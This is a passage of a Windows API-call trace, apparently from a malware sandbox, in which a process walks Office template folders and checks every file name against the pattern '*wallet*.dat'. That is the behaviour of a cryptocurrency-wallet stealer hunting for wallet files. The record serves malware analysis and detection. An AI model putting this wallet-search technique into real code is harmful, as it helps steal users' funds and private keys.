hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9818a945, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9818a945, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba712b00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xec122, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457503[[fn=Quotable]].thmx", cAlternateFileName="TM0345~4.THM")) returned 1 [0234.778] PathMatchSpecA (pszFile="TM03457503[[fn=Quotable]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.778] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9818a945, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9818a945, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xba712b00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xec122, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.778] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fbbf10, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fbbf10, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x125f51, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457510[[fn=Savon]].thmx", cAlternateFileName="TM0345~1.THM")) returned 1 [0234.778] PathMatchSpecA (pszFile="TM03457510[[fn=Savon]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.778] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x97fbbf10, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97fbbf10, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xc65ced00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x125f51, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.778] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980b633e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980b633e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x76cc4, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457515[[fn=View]].thmx", cAlternateFileName="TM0345~3.THM")) returned 1 [0234.779] PathMatchSpecA (pszFile="TM03457515[[fn=View]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.779] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x980b633e, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980b633e, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x80545900, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x76cc4, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.779] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978145cc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978145cc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xee481, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033917[[fn=Berlin]].thmx", cAlternateFileName="TM0403~1.THM")) returned 1 [0234.779] PathMatchSpecA (pszFile="TM04033917[[fn=Berlin]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.779] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x978145cc, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x978145cc, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xc65ced00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xee481, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.779] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984c4fd2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984c4fd2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xdd034400, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x165552, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033919[[fn=Circuit]].thmx", cAlternateFileName="TMFEFA~1.THM")) returned 1 [0234.779] PathMatchSpecA (pszFile="TM04033919[[fn=Circuit]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.779] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x984c4fd2, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x984c4fd2, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xdd034400, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x165552, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.780] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982f049f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982f049f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5c911300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x21dbbf, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033921[[fn=Damask]].thmx", cAlternateFileName="TM0403~4.THM")) returned 1 [0234.780] PathMatchSpecA (pszFile="TM04033921[[fn=Damask]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.780] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x982f049f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x982f049f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5c911300, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x21dbbf, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.780] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ab2749, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ab2749, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc68a00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x1ab70b, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033925[[fn=Droplet]].thmx", cAlternateFileName="TM9F98~1.THM")) returned 1 [0234.780] PathMatchSpecA (pszFile="TM04033925[[fn=Droplet]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.780] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98ab2749, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98ab2749, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xc68a00, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1ab70b, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.781] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981588c3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x981588c3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x2358a300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2c9ecd, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033927[[fn=Main Event]].thmx", cAlternateFileName="TM0403~3.THM")) returned 1 [0234.781] PathMatchSpecA (pszFile="TM04033927[[fn=Main Event]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.781] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x981588c3, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x981588c3, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x2358a300, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2c9ecd, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.781] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9852435b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9852435b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9cf09100, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x23f73b, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033929[[fn=Slate]].thmx", cAlternateFileName="TMA957~1.THM")) returned 1 [0234.781] PathMatchSpecA (pszFile="TM04033929[[fn=Slate]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.781] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9852435b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9852435b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9cf09100, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x23f73b, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.781] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9800b4e9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9800b4e9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4f742400, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x371abc, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM04033937[[fn=Vapor Trail]].thmx", cAlternateFileName="TM0403~2.THM")) returned 1 [0234.781] PathMatchSpecA (pszFile="TM04033937[[fn=Vapor Trail]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.781] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9800b4e9, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9800b4e9, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x4f742400, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x371abc, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.782] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98742454, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98742454, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x973bdf00, ftLastWriteTime.dwHighDateTime=0x1d4196d, nFileSizeHigh=0x0, nFileSizeLow=0x10a79d, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM10001114[[fn=Gallery]].thmx", cAlternateFileName="TM1000~2.THM")) returned 1 [0234.782] PathMatchSpecA (pszFile="TM10001114[[fn=Gallery]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.782] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98742454, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98742454, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x973bdf00, ftLastWriteTime.dwLowDateTime=0x1d4196d, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x10a79d, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0234.782] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 1 [0234.782] PathMatchSpecA (pszFile="TM10001115[[fn=Parcel]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.782] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9860260f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9860260f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x235700, ftLastWriteTime.dwLowDateTime=0x1d4196e, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x9477a, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0234.782] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 0 [0234.782] FindClose (in: hFindFile=0x6e1be0 | out: hFindFile=0x6e1be0) returned 1 [0234.783] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName="1033", cAlternateFileName="")) returned 0 [0234.784] FindClose (in: hFindFile=0x6e1d60 | out: hFindFile=0x6e1d60) returned 1 [0234.784] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8, cFileName="SmartArt Graphics", cAlternateFileName="SMARTA~1")) returned 1 [0234.784] PathMatchSpecA (pszFile="SmartArt Graphics", pszSpec="*wallet*.dat") returned 0 [0234.784] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0x6e1ba0 [0234.785] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0234.785] FindNextFileA (in: hFindFile=0x6e1ba0, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x4, cFileName="1033", cAlternateFileName="")) returned 1 [0234.785] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.785] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1aa0 [0234.791] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.792] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97837aab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97837aab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97837aab, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1697, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328884[[fn=architecture]].glox", cAlternateFileName="TM0332~4.GLO")) returned 1 [0234.792] PathMatchSpecA (pszFile="TM03328884[[fn=architecture]].glox", pszSpec="*wallet*.dat") returned 0 [0234.792] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x97837aab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97837aab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97837aab, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1697, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.792] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fe91ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fe91ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97fea554, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xfba, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328893[[fn=BracketList]].glox", cAlternateFileName="TME5C2~1.GLO")) returned 1 [0234.793] PathMatchSpecA (pszFile="TM03328893[[fn=BracketList]].glox", pszSpec="*wallet*.dat") returned 0 [0234.793] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x97fe91ef, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97fe91ef, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97fea554, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xfba, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.793] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9776d1cd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9776d1cd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9776d1cd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1093, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328905[[fn=Chevron Accent]].glox", cAlternateFileName="TM0332~2.GLO")) returned 1 [0234.793] PathMatchSpecA (pszFile="TM03328905[[fn=Chevron Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0234.793] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9776d1cd, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9776d1cd, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9776d1cd, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1093, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.793] FindNextFileA (in: hFindFile=0x6e1aa0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97706a49, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97706a49, 